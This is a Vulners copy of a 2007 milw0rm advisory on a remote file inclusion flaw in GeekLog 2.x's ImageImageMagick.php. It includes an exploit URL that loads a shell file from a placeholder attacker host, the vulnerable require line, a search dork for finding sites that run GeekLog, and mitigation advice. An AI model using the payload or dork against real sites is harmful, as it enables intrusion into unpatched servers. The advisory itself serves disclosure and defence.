Vulners
Lucene search
GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion
--------------------------------[ 05/18/2007 ]---------------------------------
GeekLog 2.* (ImageImageMagick.php) RFI Vuln
-----------------------------------[ ASCII ]-----------------------------------
## ### # ###
## # ### / /###
## ### ## / / ###
## # ## / ## ### ##
## ## / ## #### ##
### ## ### /## /### ## ## ## ## ## ### ####
######### ### / ### / #### / ## ## ## ## ## ### ### /
## #### ## / ### ## ###/ ## ## ## ## ## ### ###/
## ## ## ## ### #### ## ## ## ## ## ## ##
## ## ## ######## ### ## ## ## ## ## ## ##
## ## ## ####### ### ## ## ## ## ## ## ##
## ## ## ## ### ## ## # / ## ## ##
## /# ## #### / /### ## ## ### / ## /# /
####/ ### / ######/ / #### / ### / ######/ ######/ ######/
### ##/ ##### ###/ ##/ ### ##### #####
-dsd863 [at] yahoo.com-
---------------------------------[ Contacts ]---------------------------------
diesl0w @ UnderNET
#hackphreak #oldskewl #ubergeeks #linux.edu #linuxhq
----------------------------------[ Credit ]----------------------------------
rgod <rgod [at] autistici.org> for his original BaseView.php RFI find
---------------------------------[ Download ]---------------------------------
http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz
---------------------------------[ Vuln Code ]--------------------------------
[geeklog path]/system/ImageImageMagick.php?glConf[path_system]=http://www.badsite.com/shell.txt?
-----------------------------------[ Issue ]----------------------------------
-Line 3 of ImageImageMagick.php-
require $glConf['path_system'] . 'BaseImage.php';
-----------------------------------[ Google ]----------------------------------
"Powered By Geeklog"
----------------------------------[ Solution ]---------------------------------
Change php.ini and set allow_url_fopen to Off
(Not tested but disabling URL-Access will fix the issue)
or
Insert the following code before line 3:
Add the following code:
if (strpos ($_SERVER['PHP_SELF'], 'ImageImageMagick.php') !== false){ die('Cant access file by itself.'); }
----------------------------[ Word from my sponsor ]---------------------------
Non-Christians: We were born sinners in need of a fix. Without Jesus as a we are going to hell. point blank
Christians: Keep passing the faith. Crucify yourself daily. When you fall, get back up.
Romans 3:23
"for all have sinned and fall short of the glory of God"
Romans 6:23
"For the wages of sin is death, but the gift of God is eternal life through Jesus Christ our Lord."
Romans 10:9
"That if you confess with your mouth, "Jesus is Lord," and believe in your heart that God raised him from the dead, you will be saved."
# milw0rm.com [2007-05-17]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4